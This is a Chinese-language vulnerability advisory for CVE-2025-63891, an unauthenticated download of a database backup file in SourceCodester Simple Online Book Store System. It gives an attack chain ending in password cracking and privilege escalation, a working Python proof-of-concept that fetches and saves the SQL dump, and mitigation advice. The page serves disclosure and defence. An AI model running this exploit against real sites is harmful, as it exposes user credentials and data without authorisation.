CVE-2025-63891 SourceCodester Simple Online Book Store System 敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-63891

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Simple Online Book Store System

漏洞概述

CVE-2025-63891是SourceCodester Simple Online Book Store System（简单在线书店系统）中的一个高危信息泄露漏洞。该漏洞存在于系统的备份文件功能中，攻击者可以通过构造特定的HTTP GET请求，无需任何认证即可访问到位于/obs/database/obs_db.sql路径下的数据库备份文件。该备份文件包含了完整的数据库结构和内容，其中最关键的是存储了系统用户的凭证哈希值。攻击者获取这些信息后，可以进行密码破解、横向移动或进一步入侵操作。由于该漏洞影响的是Web可访问的备份文件，且无需任何认证即可利用，因此对系统的安全性构成了严重威胁。所有使用该系统的网站都可能受到影响，尤其是那些将备份文件放置在Web可访问目录下的部署方式。

技术细节

该漏洞的根本原因在于SourceCodester Simple Online Book Store System在部署时将数据库备份文件（obs_db.sql）放置在了Web服务器的可访问目录（/obs/database/）下，且未对该目录设置任何访问控制或认证机制。攻击者只需构造一个简单的HTTP GET请求，目标URL为：/obs/database/obs_db.sql，即可直接下载完整的SQL备份文件。该备份文件通常包含CREATE TABLE语句、INSERT语句等完整的数据库结构和数据，包括用户表、密码哈希、配置文件等敏感信息。由于备份文件中存储的密码通常是经过哈希处理的（如MD5、SHA1等），攻击者可以利用彩虹表或暴力破解工具尝试还原明文密码。此外，备份文件中的数据库结构信息（schema）也可能帮助攻击者更好地理解系统架构，为后续攻击提供便利。漏洞的利用不依赖于任何用户交互或特殊权限，属于最严重的安全缺陷类型之一。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标网站使用的技术栈，确认其是否使用SourceCodester Simple Online Book Store System

STEP 2

步骤2

路径探测：攻击者尝试访问常见的备份文件路径/obs/database/obs_db.sql，验证漏洞是否存在

STEP 3

步骤3

数据窃取：通过发送HTTP GET请求，无需任何认证即可下载完整的数据库备份文件obs_db.sql

STEP 4

步骤4

数据分析：攻击者解析备份文件内容，提取用户表、密码哈希、数据库结构等敏感信息

STEP 5

步骤5

密码破解：利用彩虹表或暴力破解工具对获取的密码哈希进行破解，还原用户明文密码

STEP 6

步骤6

权限提升：使用破解的凭证登录系统后台，进一步获取更高权限或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-63891 PoC - Information Disclosure in SourceCodester Simple Online Book Store System
# Target: /obs/database/obs_db.sql
# Author: Security Researcher
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-63891

def exploit_cve_2025_63891(target_url):
    """
    Exploit for CVE-2025-63891
    This PoC demonstrates how an unauthenticated attacker can retrieve
    the database backup file containing sensitive information.
    
    Args:
        target_url: Base URL of the vulnerable application
        
    Returns:
        dict: Contains status, response headers, and database backup content
    """
    
    # Construct the path to the vulnerable backup file
    backup_path = "/obs/database/obs_db.sql"
    full_url = target_url.rstrip('/') + backup_path
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "*/*"
    }
    
    print(f"[*] Target: {full_url}")
    print(f"[*] Sending HTTP GET request...")
    
    try:
        # Send unauthenticated GET request to retrieve backup file
        response = requests.get(full_url, headers=headers, timeout=30, verify=False)
        
        result = {
            "status_code": response.status_code,
            "content_length": len(response.content),
            "content_type": response.headers.get('Content-Type', 'Unknown')
        }
        
        if response.status_code == 200:
            print(f"[+] SUCCESS: Database backup file retrieved!")
            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Content Length: {len(response.content)} bytes")
            
            # Save the backup content
            with open("obs_db_backup.sql", "wb") as f:
                f.write(response.content)
            print(f"[+] Backup saved to: obs_db_backup.sql")
            
            # Display first 500 characters for verification
            content_preview = response.content.decode('utf-8', errors='ignore')[:500]
            print(f"\n[+] Content Preview:\n{content_preview}...")
            
            result["success"] = True
            result["backup_content"] = response.content.decode('utf-8', errors='ignore')
        else:
            print(f"[-] FAILED: Received status code {response.status_code}")
            result["success"] = False
        
        return result
        
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {str(e)}")
        return {"success": False, "error": str(e)}

# Example usage
if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://vulnerable-server.com"
    result = exploit_cve_2025_63891(target)

影响范围

SourceCodester Simple Online Book Store System <= 1.0

防御指南

临时缓解措施

立即将/obs/database/目录下的备份文件移出Web可访问目录，或对该目录配置禁止访问的规则。同时检查服务器上是否存在其他类似的可访问备份文件，并进行清理。建议使用.htaccess或Nginx配置阻止对*.sql文件的直接访问。如果业务必须保留在线备份功能，应将备份文件存储在受保护的私有存储中，并通过身份验证的API接口提供下载。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63891
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63891
3 Details https://www.cvedetails.com/cve/CVE-2025-63891/
4 VulDB https://vuldb.com/cve/CVE-2025-63891
5 Link http://simple.com
6 Link http://sourcecodester.com
7 Link https://github.com/lucascdsm/CVEs/blob/main/CVE-2025-63891.md